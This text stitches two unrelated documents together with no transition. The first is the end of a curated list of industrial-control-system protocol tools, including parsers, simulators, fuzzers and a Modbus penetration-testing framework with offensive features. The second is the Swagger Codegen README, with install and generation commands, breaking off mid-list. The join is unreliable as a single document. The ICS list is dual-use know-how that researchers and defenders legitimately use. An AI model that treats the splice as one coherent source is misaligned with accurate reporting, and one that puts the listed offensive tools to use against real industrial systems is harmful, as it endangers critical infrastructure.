- [CPPPO - Communications Protocol Python Parser and Originator (EtherNet/IP CIP implementation)](https://github.com/pjkundert/cpppo) - Cpppo is used to implement binary communications protocol parsers. The protocol’s communication elements are described in terms of state machines which change state in response to input events, collecting the data and producing output data artifacts.
- [pycomm](https://github.com/ruscito/pycomm) - **pycomm** is a package that includes a collection of modules used to communicate with PLCs. At the moment the first module in the package is **ab_comm**. **ab_comm** is a module that contains a set of classes used to interface Rockwell PLCs using Ethernet/IP protocol. The "clx" class can be used to communicate with Compactlogix, Controllogix PLCs The "slc" can be used to communicate with Micrologix or SLC PLCs
- [pycomm3](https://github.com/ottowayi/pycomm3) - A Python Ethernet/IP library for communicating with Allen-Bradley PLCs.
- [pyCIP](https://github.com/cpchrispye/PyCIP) - CIP protocol implementation in Python3
- [zeek plugin enip](https://github.com/amzn/zeek-plugin-enip) - EthernetIP Zeek Plugin from Amazon
- [ICSNPP ENIP and CIP for Zeek](https://github.com/cisagov/icsnpp-enip) - DHS CISA ENIP and CIP plugin for Zeek
- [Molex EtherNet/IP Tool](https://www.molex.com/mx_upload/superfamily/iccc/EtherNet_IPTool.html) - The EtherNet/IP tool (EIPTool) is a small and simple helper tool which assists to explore CIP objects of EtherNet/IP nodes, without having any EDS files. It uses the explicit messaging to read and write CIP attributes.
- [Claroty ENIP / CIP Stack Detector](https://github.com/claroty/enip-stack-detector) - EtherNet/IP & CIP Stack Detector that can help both cyber-security researchers, OT engineers, and asset owners to identify devices that are running a specific EtherNet/IP protocol stack.
## Genisys
- [ICSNPP Genisys for Zeek](https://github.com/cisagov/icsnpp-genisys) - DHS CISA Genisys plugin for Zeek
## IEC 104
- [IEC Server](/tools/mirrored/iec-server/) - Software to simulate server side of systems using a telecontrol message Protocol specified in the IEC 60870-5. Original website http://area-x1.lima-city.de is down, so this has been mirrored.
- [OpenMRTS](https://sourceforge.net/projects/mrts/) - MRTS is an attempt to create open source IEC 870-5-101/104 based components for telecontrol and supervisory systems and to become a complete solution in future.
- [QTester104](https://sourceforge.net/projects/qtester104/) - This software implements the IEC60870-5-104 protocol (client side) for substation data acquisition and control via tcp/ip network using the QT UI Framework. It can be compiled on Linux and Windows platforms. It's possible to poll and view data from the substation system (RTU/concentrator) and also send commands.
- [lib60870](https://github.com/mz-automation/lib60870) - Implements IEC 60870-5-104 protocol.
## IEC 61850
### Protocol Implementation
- [libIEC61850](http://libiec61850.com/libiec61850/) - open source library for IEC 61850.
- [rapid61850](https://github.com/stevenblair/rapid61850) - Rapid-prototyping protection and control schemes with IEC 61850
### Tools
- [IEDScout](https://www.omicronenergy.com/en/products/all/secondary-testing-calibration/iedscout/noc/1/) - IEDScout provides access to 61850-based IEDs and can simulate entire Ed. {1,2} IEDs. Specifically, IEDScout lets you look inside the IED and at its communication. All data modeled and exchanged becomes visible and accessible. Additionally, IEDScout serves numerous useful tasks, which could otherwise only be performed with dedicated engineering tools or even a functioning master station. IEDScout shows an overview representing the typical workflow of commissioning, but also provides detailed information upon request. **[commercial]** Free 30 day evaluation license.
- [Goose-Stalker](https://github.com/cutaway-security/goosestalker) - Goose-Stalker is a project to analyze and interact with Ethernet types associated with IEC 61850. Currently, the project is focused on Ethernet type 0x88b8 as published by the goose-IEC61850-scapy. The project has morphed significantly and the direction is to progress this even further.
### Traffic Generation
- [IEC 61850 Toolchain](https://github.com/smartgridadsc/IEC61850ToolChain) - This toolchain aims to enable users (e.g., power grid operators) to easily create customized datasets for the validation of cybersecurity solutions for IEC 61850 communication-based substations. This toolchain processes different inputs (e.g., substation configurations, attack configurations, and simulation settings) and carries out the necessary processing steps needed for generating the customized datasets. This toolchain is basing on an open source project libIEC61850.
## IEEE C37.118
### Protocol Implementation
- [C37.118-2005 Spec](https://ieeexplore.ieee.org/document/1611105/) -- C37.118-2005 (deprecated). Note, this is a paid IEEE spec
- [C37.118-2011 Spec](https://ieeexplore.ieee.org/document/6111219/) -- C37.118-2011 (current). Note, this is a paid IEEE spec
- [pyMU](https://github.com/iti/pymu) - Python C37.118-2011 parser
- [pyPMU](https://github.com/iicsys/pypmu) - WIP Python implementation
- [Wireshark Dissector](https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-synphasor.c) - Implemented C37.118 wireshark dissector
- [Grid Solutions Framework C37.118](https://github.com/GridProtectionAlliance/gsf/tree/master/Source/Libraries/GSF.PhasorProtocols/IEEEC37_118) - GSF implementation (.net)
- [LangSec C37.118 Parser](https://github.com/Dartmouth-Trustlab/C37.118PMU) - LangSec based C37.118 parser
- [ICSNPP Synchrophasor parser for Zeek](https://github.com/cisagov/icsnpp-synchrophasor) - DHS CISA C37.118 parser for Zeek
### Tools
- [pyMU](https://github.com/iti/pymu) - Python C37.118-2011 parser
- [pyPMU](https://github.com/iicsys/pypmu) - WIP Python implementation
- [PMU Connection Tester](https://github.com/GridProtectionAlliance/PMUConnectionTester) - Full fledged PMU connection tester, speaking c37.118 amongst many other synchrophasor protocols
## LoRaWAN
### Tools
- [chirpotle](https://github.com/seemoo-lab/chirpotle) - A LoRaWAN Securiy Evaluation Framework
## Modbus
### Protocol Implementation
- [pyModBus](https://github.com/bashwork/pymodbus) - A full modbus protocol written in python.
- [Go modbus](https://github.com/things-go/go-modbus) - modbus write in pure go, support rtu,ascii,tcp master library,also support tcp slave.
- [Modbus for Go](https://github.com/goburrow/modbus) - Fault-tolerant implementation of modbus protocol in Go (golang)
- [ModbusPal](http://modbuspal.sourceforge.net) - ModbusPal is a MODBUS slave simulator. Its purpose is to offer an easy to use interface with the capabilities to reproduce complex and realistic MODBUS environments. Mirror available [here](/tools/mirrored/modbuspal/).
- [SMOD](/tools/mirrored/smod/) - MODBUS Penetration Testing Framework. smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. (mirrored as original source is now gone)
- [mbtget](https://github.com/sourceperl/mbtget) - A simple modbus/TCP client write in pure Perl.
- [ICSNPP Modbus for Zeek](https://github.com/cisagov/icsnpp-modbus) - DHS CISA Modbus extensions to logging for Zeek
- [rodbus](https://github.com/stepfunc/rodbus) - Rust implementation of Modbus with idiomatic bindings for C, C++, .Net, and Java
### Traffic Generation
- [Modbus Traffic Generation](https://github.com/iti/ics-trafficgen/) - pyModbus-based traffic generation that can take a profile of traffic, apply scriptable variation, and result in output of Modbus traffic matching that profile.
### Fuzzing
- [AEGIS Fuzzer](https://www.automatak.com/aegis/) - Aegis™ is a smart fuzzing framework for a growing number of protocols that can identify robustness and security issues in communications software before it is deployed in a production system. **[commercial]** Early Open Source version is mirrored here: [Open-Source](/tools/mirrored/aegis-opensource).
- [Modbus Fuzzer](https://github.com/bl4ckic3/Modbus-Fuzzer) - Modbus Protocol Fuzzer
- [Modbus network fuzzer](https://github.com/s-e-knudsen/Modbus_network_fuzzer) - The modbus network fuzzer uses Boofuzz for the fuzzing of the protocol (By Søren Knudsen)
- [Fuzzowski](https://github.com/nccgroup/fuzzowski/tree/master) - partially implemented Modbus fuzzing
## Multispeak
### Protocol Implementation
- [Multispeak](https://github.com/saberdaagi/multispeak) - Implementation of multispeak protocol.
- [Simple-Mutlispeak](https://github.com/eau-claire-energy-cooperative/simple-multispeak) - a simple, extendable, interface for communicating with a webservice implementing the Multispeak Standard.
- [MS-SPEAK](https://github.com/pnnl/ms-speak) - Multi-Speak - Secure Protocol Enterprise Access Kit. Note, check the [Phase 3](https://github.com/pnnl/ms-speak/tree/Phase3) branch for more current development.
## OPC UA
### Protocol Implementation
- [OPC UA .Net Standard](https://github.com/OPCFoundation/UA-.NETStandard) - Official OPC UA .Net Standard Stack and Samples from the OPC Foundation
- [OPC UA Client GUI](https://github.com/FreeOpcUa/opcua-client-gui) - A simple OPC-UA GUI client.
- [OPC UA Server Simulator](https://integrationobjects.com/opc-products/opc-unified-architecture/opc-ua-server-simulator/) - Simulate real-time and historical data using OPC UA Server Simulator.
- [OPC UA Server and Client C++ Libraries](https://github.com/FreeOpcUa/freeopcua) - LGPL OPC-UA server and client library written in C++ and with a lot of code auto-generated from xml specification using python.
- [ICSNPP OPC-UA Binary parser for Zeek](https://github.com/cisagov/icsnpp-opcua-binary) - DHS CISA OPC UA Binary protocol parser for Zeek
## OpenADR
### Protocol Implementation / Tools
- [OpenADR 2.0a VEN Python](https://github.com/EnerNOC/oadr2-ven-python) - EnerNOC Open Source Python OpenADR 2.0a VEN client implementation
- [EPRI OpenADR VTN Implementation](https://github.com/epri-dev/OpenADR-Virtual-Top-Node) - OpenADR 2.0 Profile Specification B Profile for virtual top node implementation.
- [OpenADR Java Implementation](https://github.com/avob/OpenADR) - OpenADR minimal VEN / VTN 2.0a / 2.0b skeleton implementations in Java
- [Node-Red Implementation](https://github.com/Argonne-National-Laboratory/node-red-contrib-oadr-ven) - Node-Red OADR2 VEN Implementation w/ HTTP transport
## PROFINET
### Protocol Implementation
- [Profinet - Python](https://github.com/devkid/profinet) - Simple PROFINET implementation in python
- [Profinet - C](https://github.com/kprovost/libs7comm) - PROFINET implementation in C
- [Profinet Explorer](https://sourceforge.net/projects/profinetexplorer/) - Simple PROFINET explorer written in C#
- [zeek plugin Profinet](https://github.com/amzn/zeek-plugin-profinet) - PROFINET Zeek Plugin from Amazon
- [PROFINET GSD Checker](https://www.profibus.com/download/profinet-gsd-checker/) - Free tool to show and edit the content of GSD files for PROFINET in an easy to understand table view. It also contains a function to check the accuracy of GSD files which helps to build a valid description file.
### Fuzzing
- [ProFuzz](https://github.com/HSASec/ProFuzz) - Simple PROFINET fuzzer based on Scapy
## SEL Fast Message
- [Wireshark Dissector - SEL Fast Message](https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-selfm.c) - Wireshark Dissector for SEL Fast Message
- [Grid Solutions Framework SEL Fast Message](https://github.com/GridProtectionAlliance/gsf/tree/master/Source/Libraries/GSF.PhasorProtocols/SelFastMessage) - GSF implementation (.net)
- [SEL Applications Guides](https://www.selinc.com) - Look up AG95-10 and AG2002-14 product codes.
- [SELProtoPy](https://github.com/engineerjoe440/selprotopy) - Schweitzer Engineering Laboratories (SEL) Protocol Bindings in Python. Implements SEL Fast Meter, Fast Message, and Fast Operate.
## Siemens S7
- [Snap7](http://snap7.sourceforge.net/) - open source Siemens S7 communication library.
- [LibNoDave](http://libnodave.sourceforge.net/) - Another (less complete) open source communication library for the S7 protocol.
- [S7comm](http://sourceforge.net/projects/s7commwireshark/) - open source Wireshark dissector plugin for the Siemens S7 protocol.
- [Python Snap7 Wrapper](https://github.com/gijzelaerr/python-snap7) - A Python wrapper for the snap7 PLC communication library
- [Zeek-IDS S7 Protocol Parser](https://github.com/dw2102/S7Comm-Analyzer) - S7 protocol parser for Zeek IDS
- [zeek plugin s7](https://github.com/amzn/zeek-plugin-s7comm) - S7 Zeek Plugin from Amazon
- [SPPA S7 Data port dissector](https://github.com/klsecservices/SPPA/blob/master/sppa_dissector.lua) - SPPA-T3000 Automation server (PLC) dissector + [whitepaper](https://github.com/klsecservices/SPPA/blob/master/Security%20of%20DCS%20for%20turbines%20-%202020.pdf) by Kaspersky Security Services team
- [ICSNPP S7comm parser for Zeek](https://github.com/cisagov/icsnpp-s7comm) - DHS CISA S7comm parser for Zeek
## SSP21
- [SSP21 - Specification](https://github.com/ssp21/ssp21-spec) - SSP21 specification
- [SSP21 - C++](https://github.com/ssp21/ssp21-spec) - SSP21 reference implementation in C++
- [SSP21 - Rust](https://github.com/ssp21/ssp21-rs-core) - SSP21 core library in Rust
## TriStation
- [FireEye TriStation Wireshark Dissector](https://github.com/stvemillertime/TriStation) - reverse engineered wireshark dissector from Mandiant/FireEye team after Triton discovery.
- [Nozomi TriStation Wireshark Dissector](https://github.com/NozomiNetworks/tricotools) - another TriStation dissector, this time from Nozomi, also incldues pcap, and basic honeypot simulator.
## Zigbee
- [Killerbee](https://github.com/riverloopsec/killerbee) - IEEE 802.15.4/ZigBee Security Research Toolkit.
## General Protocol Fuzzing
- [AFL](http://lcamtuf.coredump.cx/afl/) - American fuzzy lop is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.
- [WinAFL](https://github.com/ivanfratric/winafl) - AFL that works for Windows binaries.
(creative commons license)
|
# Swagger Code Generator
- Master (2.3.0): [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)
[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)
[![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen)
- 3.0.0: [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/3.0.0.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea/3.0.0.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)
[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=3.0.0&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)
[![Java Test](https://circleci.com/gh/swagger-api/swagger-codegen/tree/3.0.0.svg?style=shield)](https://circleci.com/gh/swagger-api/swagger-codegen)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)
[![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen)
:star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star:
:notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover:
:warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning:
:rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket:
## Overview
This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported:
- **API clients**: **ActionScript**, **Apex**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Eiffel**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign, RestTemplate, RESTEasy), **Kotlin**, **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **PowerShell**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x, 4.x), **Typescript** (Angular1.x, Angular2.x, Fetch, jQuery, Node)
- **Server stubs**: **C#** (ASP.NET Core, NancyFx), **C++** (Pistache, Restbed), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy, Play Framework), **PHP** (Lumen, Slim, Silex, [Symfony](https://symfony.com/), [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra)
- **API documentation generators**: **HTML**, **Confluence Wiki**
- **Configuration files**: [**Apache2**](https://httpd.apache.org/)
- **Others**: **JMeter**
Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project.
# Table of contents
- [Swagger Code Generator](#swagger-code-generator)
- [Overview](#overview)
- [Table of Contents](#table-of-contents)
- Installation
- [Compatibility](#compatibility)
- [Prerequisites](#prerequisites)
- [OS X Users](#os-x-users)
- [Building](#building)
- [Docker](#docker)
- [Build and run](#build-and-run-using-docker)
- [Run docker in Vagrant](#run-docker-in-vagrant)
- [Public Docker image](#public-docker-image)
- [Homebrew](#homebrew)
- [Getting Started](#getting-started)
- Generators
- [To generate a sample client library](#to-generate-a-sample-client-library)
- [Generating libraries from your server](#generating-libraries-from-your-server)
- [Modifying the client library format](#modifying-the-client-library-format)
- [Making your own codegen modules](#making-your-own-codegen-modules)
- [Where is Javascript???](#where-is-javascript)
- [Generating a client from local files](#generating-a-client-from-local-files)
- [Customizing the generator](#customizing-the-generator)
- [Validating your OpenAPI Spec](#validating-your-openapi-spec)
- [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)
- [Generating static html api documentation](#generating-static-html-api-documentation)
- [To build a server stub](#to-build-a-server-stub)
- [To build the codegen library](#to-build-the-codegen-library)
- [Workflow Integration](#workflow-integration)
- [Github Integration](#github-integration)
- [Online Generators](#online-generators)
- [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)
- [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen)
- [Presentations/Videos/Tutorials/Books](#presentationsvideostutorialsbooks)
- [Swagger Codegen Core Team](#swagger-codegen-core-team)
- [Swagger Codegen Evangelist](#swagger-codegen-evangelist)
- [License](#license)
## Compatibility
The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification:
Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes
-------------------------- | ------------ | -------------------------- | -----
3.0.0 (upcoming major release) [SNAPSHOT](https://oss.sonatype.org/content/repositories/snapshots/io/swagger/swagger-codegen-cli/3.0.0-SNAPSHOT/)| TBD | 1.0, 1.1, 1.2, 2.0, 3.0 | Major release with breaking changes
2.3.0 (current master, upcoming minor release) [SNAPSHOT](https://oss.sonatype.org/content/repositories/snapshots/io/swagger/swagger-codegen-cli/2.3.0-SNAPSHOT/)| Jul/Aug 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes
[2.2.3](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.3) (**current stable**) | 2017-07-15 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.3](https://github.com/swagger-api/swagger-codegen/tree/v2.2.3)
[2.2.2](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.2) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2)
[2.2.1](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.2.1) | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1)
[2.1.6](https://github.com/swagger-api/swagger-codegen/releases/tag/v2.1.6) | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6)
2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17)
1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)
### Prerequisites
If you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum):
```sh
wget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.3/swagger-codegen-cli-2.2.3.jar -O swagger-codegen-cli.jar
java -jar swagger-codegen-cli.jar help
```
On a mac, it's even easier with `brew`:
```sh
brew install swagger-codegen
```
To build from source, you need the following installed and available in your $PATH:
* [Java 7 or 8](http://java.oracle.com)
* [Apache maven 3.3.3 or greater](http://maven.apache.org/)
#### OS X Users
Don't forget to install Java 7 or 8. You probably have 1.6.
Export JAVA_HOME in order to use the supported Java version:
```sh
export JAVA_HOME=`/usr/libexec/java_home -v 1.8`
export PATH=${JAVA_HOME}/bin:$PATH
```
### Building
After cloning the project, you can build it from source with this command:
```sh
mvn clean package
```
### Homebrew
To install, run `brew install swagger-codegen`
Here is an example usage:
```sh
swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/
```
### Docker
#### Development in docker
You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen`
in the docker container. It also maps `~/.m2/repository` to the appropriate container location.
To execute `mvn package`:
```sh
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
./run-in-docker.sh mvn package
```
Build artifacts are now accessible in your working directory.
Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example:
```sh
./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli
./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli
./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client
./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \
-l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore
```
#### Run Docker in Vagrant
Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads).
```sh
git clone http://github.com/swagger-api/swagger-codegen.git
cd swagger-codegen
vagrant up
vagrant ssh
cd /vagrant
./run-in-docker.sh mvn package
```
#### Public Pre-built Docker images
- https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service)
- https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI)
##### Swagger Generator Docker Image
The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code.
Example usage (note this assumes `jq` is installed for command line processing of JSON):
```sh
# Start container and save the container id
CID=$(docker run -d swaggerapi/swagger-generator)
# allow for startup
sleep 5
# Get the IP of the running container
GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID)
# Execute an HTTP request and store the download link
RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"')
# Download the generated zip and redirect to a file
curl $RESULT > result.zip
# Shutdown the swagger generator image
docker stop $CID && docker rm $CID
```
In the example above, `result.zip` will contain the generated client.
##### Swagger Codegen CLI Docker Image
The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version.
To generate code with this image, you'll need to mount a local location as a volume.
Example:
```sh
docker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l go \
-o /local/out/go
```
The generated code will be located under `./out/go` in the current directory.
## Getting Started
To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following
```sh
git clone https://github.com/swagger-api/swagger-codegen
cd swagger-codegen
mvn clean package
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l php \
-o /var/tmp/php_api_client
```
(if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`)
You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.3/swagger-codegen-cli-2.2.3.jar)
To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate`
To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php`
## Generators
### To generate a sample client library
You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:
```sh
./bin/java-petstore.sh
```
(On Windows, run `.\bin\windows\java-petstore.bat` instead)
This will run the generator with this command:
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java
```
with a number of options. You can get the options with the `help generate` command (below only shows partal results):
```
NAME
swagger-codegen-cli generate - Generate code with chosen lang
SYNOPSIS
swagger-codegen-cli generate
[(-a <authorization> | --auth <authorization>)]
[--additional-properties <additional properties>...]
[--api-package <api package>] [--artifact-id <artifact id>]
[--artifact-version <artifact version>]
[(-c <configuration file> | --config <configuration file>)]
[-D <system properties>...] [--git-repo-id <git repo id>]
[--git-user-id <git user id>] [--group-id <group id>]
[--http-user-agent <http user agent>]
(-i <spec file> | --input-spec <spec file>)
[--ignore-file-override <ignore file override location>]
[--import-mappings <import mappings>...]
[--instantiation-types <instantiation types>...]
[--invoker-package <invoker package>]
(-l <language> | --lang <language>)
[--language-specific-primitives <language specific primitives>...]
[--library <library>] [--model-name-prefix <model name prefix>]
[--model-name-suffix <model name suffix>]
[--model-package <model package>]
[(-o <output directory> | --output <output directory>)]
[--release-note <release note>] [--remove-operation-id-prefix]
[--reserved-words-mappings <reserved word mappings>...]
[(-s | --skip-overwrite)]
[(-t <template directory> | --template-dir <template directory>)]
[--type-mappings <type mappings>...] [(-v | --verbose)]
OPTIONS
-a <authorization>, --auth <authorization>
adds authorization headers when fetching the swagger definitions
remotely. Pass in a URL-encoded string of name:header with a comma
separating multiple values
...... (results omitted)
-v, --verbose
verbose mode
```
You can then compile and run the client, as well as unit tests against it:
```sh
cd samples/client/petstore/java
mvn package
```
Other languages have petstore samples, too:
```sh
./bin/android-petstore.sh
./bin/java-petstore.sh
./bin/objc-petstore.sh
```
### Generating libraries from your server
It's just as easy--just use the `-i` flag to point to either a server or file.
### Modifying the client library format
Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own.
You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy.
### Making your own codegen modules
If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries:
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \
-o output/myLibrary -n myClientCodegen -p com.my.company.codegen
```
This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic.
You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such:
```sh
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
For Windows users, you will need to use `;` instead of `:` in the classpath, e.g.
```
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen
```
Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library:
```sh
java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \
io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\
-i http://petstore.swagger.io/v2/swagger.json \
-o myClient
```
### Where is Javascript???
See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require
static code generation.
There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification.
:exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala.
### Generating a client from local files
If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument
to the code generator like this:
```
-i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json
```
Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane.
### Selective generation
You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output:
The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated:
```sh
# generate only models
java -Dmodels {opts}
# generate only apis
java -Dapis {opts}
# generate only supporting files
java -DsupportingFiles
# generate models and supporting files
java -Dmodels -DsupportingFiles
```
To control the specific files being generated, you can pass a CSV list of what you want:
```sh
# generate the User and Pet models only
-Dmodels=User,Pet
# generate the User model and the supportingFile `StringUtil.java`:
-Dmodels=User -DsupportingFiles=StringUtil.java
```
To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`.
These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`):
```sh
# generate only models (with tests and documentation)
java -Dmodels {opts}
# generate only models (with tests but no documentation)
java -Dmodels -DmodelDocs=false {opts}
# generate only User and Pet models (no tests and no documentation)
java -Dmodels=User,Pet -DmodelTests=false {opts}
# generate only apis (without tests)
